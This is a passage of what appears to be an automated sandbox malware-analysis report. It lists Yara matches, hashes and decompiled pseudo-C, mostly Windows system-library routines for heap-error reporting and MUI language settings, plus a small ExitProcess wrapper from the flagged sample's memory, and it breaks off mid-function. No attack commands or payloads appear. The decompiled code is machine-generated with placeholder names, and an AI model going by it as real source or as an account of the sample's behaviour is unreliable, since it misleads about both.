                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                      0x0041a0b3
                                                      0x0041a0ca
                                                      0x0041a0d8

                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0169967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d6398710494afdd972947d2ef387799288e6920ec4d6990eab516c24879f9353
                                                      • Instruction ID: a6455f3710ec38fec5d8b1b647dee92fe15eae0c1b417a339a4af43ac770bc00
                                                      • Opcode Fuzzy Hash: d6398710494afdd972947d2ef387799288e6920ec4d6990eab516c24879f9353
                                                      • Instruction Fuzzy Hash: 4AB02B718010C0C6EB01D7A40E08717390477C1300F52C011D1030280B4738C080F5F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 0170B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • write to, xrefs: 0170B4A6
                                                      • *** then kb to get the faulting stack, xrefs: 0170B51C
                                                      • *** enter .exr %p for the exception record, xrefs: 0170B4F1
                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0170B2DC
                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0170B39B
                                                      • read from, xrefs: 0170B4AD, 0170B4B2
                                                      • a NULL pointer, xrefs: 0170B4E0
                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0170B484
                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0170B305
                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 0170B352
                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 0170B48F
                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0170B2F3
                                                      • The resource is owned exclusively by thread %p, xrefs: 0170B374
                                                      • The instruction at %p tried to %s , xrefs: 0170B4B6
                                                      • The critical section is owned by thread %p., xrefs: 0170B3B9
                                                      • *** enter .cxr %p for the context, xrefs: 0170B50D
                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0170B53F
                                                      • an invalid address, %p, xrefs: 0170B4CF
                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0170B38F
                                                      • This failed because of error %Ix., xrefs: 0170B446
                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0170B314
                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0170B476
                                                      • The resource is owned shared by %d threads, xrefs: 0170B37E
                                                      • The instruction at %p referenced memory at %p., xrefs: 0170B432
                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0170B323
                                                      • Go determine why that thread has not released the critical section., xrefs: 0170B3C5
                                                      • <unknown>, xrefs: 0170B27E, 0170B2D1, 0170B350, 0170B399, 0170B417, 0170B48E
                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0170B3D6
                                                      • *** Inpage error in %ws:%s, xrefs: 0170B418
                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0170B47D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                      • API String ID: 0-108210295
                                                      • Opcode ID: e85205bb131deea33bc848ebf45b2089077469b43c34bd82556f2e39f36ae815
                                                      • Instruction ID: a9793d8dc6754e3757a0ed75f31fd755a5056ac6fc5a2f35c28c5e2af90dbec8
                                                      • Opcode Fuzzy Hash: e85205bb131deea33bc848ebf45b2089077469b43c34bd82556f2e39f36ae815
                                                      • Instruction Fuzzy Hash: 6381587DA80300FFDB225B8ACC49D7B7FA6EF66A59F41008CF5061B192D3618611CB76
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01711C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E01711C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x16348a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0165B150();
				} else {
					E0165B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x174589c);
				E0165B150("Heap error detected at %p (heap handle %p)\n",  *0x17458a0);
				_t27 =  *0x1745898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01711E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0165B150();
				} else {
					E0165B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0165B150("Error code: %d - %s\n",  *0x1745898);
				_t113 =  *0x17458a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0165B150();
					} else {
						E0165B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0165B150("Parameter1: %p\n",  *0x17458a4);
				}
				_t115 =  *0x17458a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0165B150();
					} else {
						E0165B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0165B150("Parameter2: %p\n",  *0x17458a8);
				}
				_t117 =  *0x17458ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0165B150();
					} else {
						E0165B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0165B150("Parameter3: %p\n",  *0x17458ac);
				}
				_t119 =  *0x17458b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0165B150();
					} else {
						E0165B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x17458b4);
					E0165B150("Last known valid blocks: before - %p, after - %p\n",  *0x17458b0);
				} else {
					_t120 =  *0x17458b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0165B150();
				} else {
					E0165B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0165B150("Stack trace available at %p\n", 0x17458c0);
			}











                                                      0x01711c10
                                                      0x01711c16
                                                      0x01711c1e
                                                      0x01711c3d
                                                      0x01711c3e
                                                      0x01711c20
                                                      0x01711c35
                                                      0x01711c3a
                                                      0x01711c44
                                                      0x01711c55
                                                      0x01711c5a
                                                      0x01711c65
                                                      0x01711c67
                                                      0x00000000
                                                      0x01711c6e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01711c67
                                                      0x01711cdc
                                                      0x01711ce5
                                                      0x01711d04
                                                      0x01711d05
                                                      0x01711ce7
                                                      0x01711cfc
                                                      0x01711d01
                                                      0x01711d0b
                                                      0x01711d17
                                                      0x01711d1f
                                                      0x01711d25
                                                      0x01711d30
                                                      0x01711d4f
                                                      0x01711d50
                                                      0x01711d32
                                                      0x01711d47
                                                      0x01711d4c
                                                      0x01711d61
                                                      0x01711d67
                                                      0x01711d68
                                                      0x01711d6e
                                                      0x01711d79
                                                      0x01711d98
                                                      0x01711d99
                                                      0x01711d7b
                                                      0x01711d90
                                                      0x01711d95
                                                      0x01711daa
                                                      0x01711db0
                                                      0x01711db1
                                                      0x01711db7
                                                      0x01711dc2
                                                      0x01711de1
                                                      0x01711de2
                                                      0x01711dc4
                                                      0x01711dd9
                                                      0x01711dde
                                                      0x01711df3
                                                      0x01711df9
                                                      0x01711dfa
                                                      0x01711e00
                                                      0x01711e0a
                                                      0x01711e13
                                                      0x01711e32
                                                      0x01711e33
                                                      0x01711e15
                                                      0x01711e2a
                                                      0x01711e2f
                                                      0x01711e39
                                                      0x01711e4a
                                                      0x01711e02
                                                      0x01711e02
                                                      0x01711e08
                                                      0x00000000
                                                      0x00000000
                                                      0x01711e08
                                                      0x01711e5b
                                                      0x01711e7a
                                                      0x01711e7b
                                                      0x01711e5d
                                                      0x01711e72
                                                      0x01711e77
                                                      0x01711e95

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                      • API String ID: 0-2897834094
                                                      • Opcode ID: d46e4b85e90827d83d2dd036f1af52e2ecf669e0ea25b41aacb9c32a9f6000ba
                                                      • Instruction ID: 34a7c0ad625edaf7ec67e51311e789ba23a9571e031ce3649cd1f47646fdc0f0
                                                      • Opcode Fuzzy Hash: d46e4b85e90827d83d2dd036f1af52e2ecf669e0ea25b41aacb9c32a9f6000ba
                                                      • Instruction Fuzzy Hash: 7D61D236551145DFD7A1AFBDDC84D21B3A6FB04931F8980AEFA0A5F344DA299C808F4E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01663D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E01663D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01661B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01661B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01661B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01661B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01661B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01674620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0169F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E016A1370(_t276, 0x1634e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0169BB40(0,  &_v68, _t170);
									if(L016643C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0169BB40(_t257,  &_v68, _t243);
								if(L016643C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E016A1370(_t278, 0x1634e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01674620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0169F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E016A1370(_v16, 0x1634e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0169BB40(_t262,  &_v68, _t244);
								if(L016643C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E016A1370(_t282, 0x1634e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0169BB40(_t262,  &_v68, _t201);
							if(L016643C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01674620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0169F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E016A1370(_t280, 0x1634e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0169BB40(_t267,  &_v68, _t245);
							if(L016643C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E016A1370(_t284, 0x1634e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0169BB40(_t267,  &_v68, _t224);
						if(L016643C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                      0x01663d3c
                                                      0x01663d42
                                                      0x01663d44
                                                      0x01663d46
                                                      0x01663d49
                                                      0x01663d4c
                                                      0x01663d4f
                                                      0x01663d52
                                                      0x01663d55
                                                      0x01663d58
                                                      0x01663d5b
                                                      0x01663d5f
                                                      0x01663d61
                                                      0x01663d66
                                                      0x016b8213
                                                      0x016b8218
                                                      0x01664085
                                                      0x01664088
                                                      0x0166408e
                                                      0x01664094
                                                      0x0166409a
                                                      0x016640a0
                                                      0x016640a6
                                                      0x016640a9
                                                      0x016640af
                                                      0x016640b6
                                                      0x016640bd
                                                      0x016640bd
                                                      0x01663d83
                                                      0x016b821f
                                                      0x016b8229
                                                      0x016b8238
                                                      0x016b8238
                                                      0x016b823d
                                                      0x016b823d
                                                      0x01663da0
                                                      0x01663daf
                                                      0x01663db5
                                                      0x01663dba
                                                      0x01663dba
                                                      0x01663dd4
                                                      0x01663e94
                                                      0x01663eab
                                                      0x01663f6d
                                                      0x01663f84
                                                      0x0166406b
                                                      0x0166406b
                                                      0x0166406e
                                                      0x0166406e
                                                      0x01664070
                                                      0x01664074
                                                      0x016b8351
                                                      0x016b8351
                                                      0x0166407a
                                                      0x0166407f
                                                      0x016b835d
                                                      0x016b8370
                                                      0x016b8377
                                                      0x016b8379
                                                      0x016b837c
                                                      0x016b837c
                                                      0x016b835d
                                                      0x00000000
                                                      0x0166407f
                                                      0x01663f8a
                                                      0x01663f8d
                                                      0x01663f90
                                                      0x01663f95
                                                      0x016b830d
                                                      0x016b830f
                                                      0x01663f9b
                                                      0x01663fac
                                                      0x01663fae
                                                      0x01663fb1
                                                      0x01663fb1
                                                      0x01663fb6
                                                      0x016b8317
                                                      0x016b831a
                                                      0x00000000
                                                      0x01663fbc
                                                      0x01663fc1
                                                      0x01663fc9
                                                      0x01663fd7
                                                      0x01663fda
                                                      0x01663fdd
                                                      0x01664021
                                                      0x01664021
                                                      0x01664029
                                                      0x01664030
                                                      0x01664044
                                                      0x01664046
                                                      0x01664046
                                                      0x01664044
                                                      0x01664049
                                                      0x016b8327
                                                      0x016b8334
                                                      0x016b8339
                                                      0x016b833c
                                                      0x0166404f
                                                      0x0166404f
                                                      0x0166404f
                                                      0x01664051
                                                      0x01664056
                                                      0x01664063
                                                      0x01664063
                                                      0x01664068
                                                      0x00000000
                                                      0x01664068
                                                      0x01663fdf
                                                      0x01663fe2
                                                      0x01663fe4
                                                      0x01663fe7
                                                      0x01663fef
                                                      0x01664003
                                                      0x01664005
                                                      0x01664005
                                                      0x0166400c
                                                      0x01664013
                                                      0x01664016
                                                      0x01664017
                                                      0x0166401b
                                                      0x0166401e
                                                      0x00000000
                                                      0x0166401e
                                                      0x01663fb6
                                                      0x01663eb1
                                                      0x01663eb4
                                                      0x01663eb7
                                                      0x01663ebc
                                                      0x016b82a9
                                                      0x016b82ab
                                                      0x01663ec2
                                                      0x01663ed3
                                                      0x01663ed5
                                                      0x01663ed8
                                                      0x01663ed8
                                                      0x01663edd
                                                      0x016b82b3
                                                      0x016b82b6
                                                      0x00000000
                                                      0x01663ee3
                                                      0x01663ee8
                                                      0x01663eed
                                                      0x01663ef0
                                                      0x01663ef3
                                                      0x01663f02
                                                      0x01663f05
                                                      0x01663f08
                                                      0x016b82c0
                                                      0x016b82c3
                                                      0x016b82c5
                                                      0x016b82c8
                                                      0x016b82d0
                                                      0x016b82e4
                                                      0x016b82e6
                                                      0x016b82e6
                                                      0x016b82ed
                                                      0x016b82f4
                                                      0x016b82f7
                                                      0x016b82f8
                                                      0x016b82fc
                                                      0x016b82ff
                                                      0x016b82ff
                                                      0x01663f0e
                                                      0x01663f11
                                                      0x01663f16
                                                      0x01663f1d
                                                      0x01663f31
                                                      0x016b8307
                                                      0x016b8307
                                                      0x01663f31
                                                      0x01663f39
                                                      0x01663f48
                                                      0x01663f4d
                                                      0x01663f50
                                                      0x01663f50
                                                      0x01663f53
                                                      0x01663f58
                                                      0x01663f65
                                                      0x01663f65
                                                      0x01663f6a
                                                      0x00000000
                                                      0x01663f6a
                                                      0x01663edd
                                                      0x01663dda
                                                      0x01663ddd
                                                      0x01663de0
                                                      0x01663de5
                                                      0x016b8245
                                                      0x01663deb
                                                      0x01663df7
                                                      0x01663dfc
                                                      0x01663dfe
                                                      0x01663e01
                                                      0x01663e01
                                                      0x01663e06
                                                      0x016b824d
                                                      0x016b824f
                                                      0x016b8254
                                                      0x00000000
                                                      0x01663e0c
                                                      0x01663e11
                                                      0x01663e16
                                                      0x01663e19
                                                      0x01663e29
                                                      0x01663e2c
                                                      0x01663e2f
                                                      0x016b825c
                                                      0x016b825f
                                                      0x016b8261
                                                      0x016b8264
                                                      0x016b826c
                                                      0x016b8280
                                                      0x016b8282
                                                      0x016b8282
                                                      0x016b8289
                                                      0x016b8290
                                                      0x016b8293
                                                      0x016b8294
                                                      0x016b8298
                                                      0x016b829b
                                                      0x016b829b
                                                      0x01663e35
                                                      0x01663e38
                                                      0x01663e3d
                                                      0x01663e44
                                                      0x01663e58
                                                      0x016b82a3
                                                      0x016b82a3
                                                      0x01663e58
                                                      0x01663e60
                                                      0x01663e6f
                                                      0x01663e74
                                                      0x01663e77
                                                      0x01663e77
                                                      0x01663e7a
                                                      0x01663e7f
                                                      0x01663e8c
                                                      0x01663e8c
                                                      0x01663e91
                                                      0x00000000
                                                      0x01663e91

                                                      Strings
                                                      • Kernel-MUI-Language-SKU, xrefs: 01663F70
                                                      • Kernel-MUI-Number-Allowed, xrefs: 01663D8C
                                                      • Kernel-MUI-Language-Allowed, xrefs: 01663DC0
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 01663E97
                                                      • WindowsExcludedProcs, xrefs: 01663D6F
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: 2eb8a16f62584e864245fcd6b2281f4978c694f589c77a660d0151d2da7dece8
                                                      • Instruction ID: f60531f50b20b61c11bd21f966e2bfc843349c0bb0c6f2ed0555743dc0e28c91
                                                      • Opcode Fuzzy Hash: 2eb8a16f62584e864245fcd6b2281f4978c694f589c77a660d0151d2da7dece8
                                                      • Instruction Fuzzy Hash: A9F13A72D00629EBCB11DF98CD80AEEBBBDFF58650F15406AE905A7350DB359E41CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01688E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E01688E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x174d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1748464; // 0x74b10110
				if(_t55 == 0) {
